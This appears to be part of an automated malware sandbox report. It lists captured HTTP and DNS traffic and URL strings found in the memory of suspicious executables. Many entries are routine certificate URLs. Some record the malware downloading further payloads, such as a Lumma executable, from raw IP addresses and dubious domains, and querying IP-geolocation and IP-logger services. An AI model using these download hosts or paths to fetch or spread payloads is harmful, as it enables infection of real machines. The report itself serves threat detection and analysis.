Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cacheCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.myip.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: vk.com
Source: global traffic	DNS traffic detected: DNS query: monoblocked.com
Source: global traffic	DNS traffic detected: DNS query: dod.fastbutters.com
Source: global traffic	DNS traffic detected: DNS query: zanzibarpivo.com
Source: global traffic	DNS traffic detected: DNS query: pofix.red
Source: global traffic	DNS traffic detected: DNS query: sextipolar.sbs
Source: global traffic	DNS traffic detected: DNS query: triedchicken.net
Source: global traffic	DNS traffic detected: DNS query: cheremushki.net
Source: global traffic	DNS traffic detected: DNS query: carthewasher.net
Source: global traffic	DNS traffic detected: DNS query: f.123654987.xyz
Source: global traffic	DNS traffic detected: DNS query: sun6-20.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-22.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-21.userapi.com
Source: global traffic	DNS traffic detected: DNS query: iplis.ru
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: cskuxgp.net

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:21 GMTSet-Cookie: _subid=2aviuam2b4oin; expires=Sat, 01 Jun 2024 06:40:21 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:42 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc7926b9c2415-IAD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:22 GMTSet-Cookie: _subid=2aviuam2b4oj5; expires=Sat, 01 Jun 2024 06:40:22 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:44 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc79a9dec8791-IAD

Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/dl.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/padla/fiona.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/padla/fiona.exeG
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe5_
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe;q
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exete
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exeteata2
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exezQo
Source: softjenimmp3converter.exe, 00000031.00000002.3134144272.0000000003290000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.88.90.160/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec938f45
Source: softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.88.90.160/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14
Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage12.php
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage12.php.
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpE
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpZ
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpi
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpz
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.php
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabj
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2408107032.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2536998293.0000000002FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.aap
Source: WlCIinu0yp.exe, 00000000.00000003.1755200268.00000000041E4000.00000004.00000020.00020000.00000000.sdmp, lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000002.3123961585.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000000.1910706817.000000000040A000.00000008.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0?
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0Q
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.php.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.phpa6592c80f8124e769b4e8a07f7.exexe
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://qtav.org2
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C500179000.00000004.00000800.00020000.00000000.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C50003B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqw
